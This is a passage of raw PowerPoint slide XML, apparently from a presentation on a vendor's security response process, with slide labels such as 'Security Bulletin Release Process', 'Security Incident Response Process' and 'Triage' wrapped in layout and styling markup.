                <a:uFillTx/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Sr. Program Mgr Lead</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="4800" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="-150" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln w="3175">
                <a:noFill/>
              </a:ln>
              <a:gradFill flip="none" rotWithShape="1">
                <a:gsLst>
                  <a:gs pos="0">
                    <a:srgbClr val="FFFFB9"/>
                  </a:gs>
                  <a:gs pos="36000">
                    <a:srgbClr val="FFFF99"/>
                  </a:gs>
                  <a:gs pos="86000">
                    <a:srgbClr val="F6AE1E"/>
                  </a:gs>
                </a:gsLst>
                <a:lin ang="5400000" scaled="0"/>
                <a:tileRect/>
              </a:gradFill>
              <a:effectLst>
                <a:outerShdw blurRad="50800" dist="38100" dir="2700000" algn="tl" rotWithShape="0">
                  <a:prstClr val="black">
                    <a:alpha val="40000"/>
                  </a:prstClr>
                </a:outerShdw>
              </a:effectLst>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3074" name="Picture 2" descr="D:\CAPTAINSTEVEfinal1_headshot_2.jpg"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="533400" y="1600200"/>
            <a:ext cx="3781425" cy="4572000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
    </p:spTree>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32" descr="cooltools-shape"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4614863" y="1414463"/>
            <a:ext cx="4205287" cy="5116512"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700" algn="ctr">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="30" name="Picture 29" descr="cooltools-shape.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:srcRect l="2671" t="7408" r="2926" b="12963"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4952396" y="2886075"/>
            <a:ext cx="3533775" cy="819150"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:effectLst>
            <a:outerShdw blurRad="63500" sx="102000" sy="102000" algn="ctr" rotWithShape="0">
              <a:prstClr val="black">
                <a:alpha val="40000"/>
              </a:prstClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="31" name="Picture 30" descr="cooltools-shape.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:srcRect l="2459" t="6944" r="2884" b="12500"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4947633" y="4995863"/>
            <a:ext cx="3543300" cy="828675"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:effectLst>
            <a:outerShdw blurRad="63500" sx="102000" sy="102000" algn="ctr" rotWithShape="0">
              <a:prstClr val="black">
                <a:alpha val="40000"/>
              </a:prstClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="32" name="Picture 31" descr="cooltools-shape.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:srcRect l="2459" t="7099" r="2884" b="13272"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4947633" y="3940969"/>
            <a:ext cx="3543300" cy="819150"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:effectLst>
            <a:outerShdw blurRad="63500" sx="102000" sy="102000" algn="ctr" rotWithShape="0">
              <a:prstClr val="black">
                <a:alpha val="40000"/>
              </a:prstClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="30726" name="Picture 32" descr="cooltools-shape"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="311150" y="1414463"/>
            <a:ext cx="4205288" cy="5116512"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700" algn="ctr">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="60420" name="Text Box 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="547688" y="1614488"/>
            <a:ext cx="3733800" cy="946150"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000"/>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Security Bulletin Release Process</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="60426" name="Text Box 10"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4849813" y="1614488"/>
            <a:ext cx="3733800" cy="946150"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000"/>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Security Incident Response Process</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="60427" name="Text Box 11"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5040313" y="2995613"/>
            <a:ext cx="3352800" cy="587375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="30000"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000"/>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Timely and </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000"/>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000"/>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Relevant Information</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="60428" name="Text Box 12"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4964113" y="4173538"/>
            <a:ext cx="3505200" cy="366712"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000"/>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Mitigations and Protection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="60429" name="Text Box 13"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4964113" y="5224463"/>
            <a:ext cx="3505200" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000"/>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Solution and Guidance</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="60430" name="Rectangle 14"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="228600"/>
            <a:ext cx="8229600" cy="664797"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="914363" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Security Response Process</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="22" name="Picture 21" descr="cooltools-shape.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:srcRect l="2671" t="7408" r="2926" b="12963"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="647096" y="2886075"/>
            <a:ext cx="3533775" cy="819150"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:effectLst>
            <a:outerShdw blurRad="63500" sx="102000" sy="102000" algn="ctr" rotWithShape="0">
              <a:prstClr val="black">
                <a:alpha val="40000"/>
              </a:prstClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="25" name="Picture 24" descr="cooltools-shape.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:srcRect l="2459" t="6944" r="2884" b="12500"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="642333" y="4995863"/>
            <a:ext cx="3543300" cy="828675"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:effectLst>
            <a:outerShdw blurRad="63500" sx="102000" sy="102000" algn="ctr" rotWithShape="0">
              <a:prstClr val="black">
                <a:alpha val="40000"/>
              </a:prstClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="26" name="Picture 25" descr="cooltools-shape.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:srcRect l="2459" t="7099" r="2884" b="13272"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="642333" y="3940969"/>
            <a:ext cx="3543300" cy="819150"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:effectLst>
            <a:outerShdw blurRad="63500" sx="102000" sy="102000" algn="ctr" rotWithShape="0">
              <a:prstClr val="black">
                <a:alpha val="40000"/>
              </a:prstClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="60421" name="Text Box 5"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="585788" y="2995613"/>
            <a:ext cx="3657600" cy="587375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="15000"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000"/>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Repeatable, </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000"/>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000"/>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Consistent, Process</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="60422" name="Text Box 6"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="814388" y="4062413"/>
            <a:ext cx="3200400" cy="587375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="10000"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000"/>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>High Quality </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000"/>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000"/>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Product Updates</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="60423" name="Text Box 7"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="661988" y="5114925"/>
            <a:ext cx="3505200" cy="587375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="30000"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000"/>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Authoritative </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000"/>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000"/>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Accurate Guidance</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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Number Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="6356350"/>
            <a:ext cx="2133600" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{9DEF330A-B38F-4754-89E2-D89F8C4AFF8B}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>21</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="31747" name="Picture 2" descr="up angled blue arrow"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="76200" y="1455738"/>
            <a:ext cx="8564563" cy="4487862"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="31748" name="Group 4"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="1838325" y="2057400"/>
            <a:ext cx="1855788" cy="1174750"/>
            <a:chOff x="1100" y="1206"/>
            <a:chExt cx="1169" cy="617"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="31781" name="Picture 5" descr="Slide-5_Box-B"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId5"/>
            <a:srcRect/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1100" y="1206"/>
              <a:ext cx="1169" cy="617"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="43014" name="Text Box 6"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeAspect="1" noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1231" y="1382"/>
              <a:ext cx="764" cy="143"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="12700" algn="ctr">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr>
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0">
                <a:lnSpc>
                  <a:spcPct val="85000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPct val="20000"/>
                </a:spcBef>
                <a:buClr>
                  <a:schemeClr val="folHlink"/>
                </a:buClr>
                <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
                <a:buNone/>
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                  <a:effectLst>
                    <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                      <a:srgbClr val="000000"/>
                    </a:outerShdw>
                  </a:effectLst>
                  <a:latin typeface="Arial" charset="0"/>
                  <a:cs typeface="Arial" charset="0"/>
                </a:rPr>
                <a:t>Triage</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31749" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1828800" y="2982913"/>
            <a:ext cx="1704975" cy="1382712"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
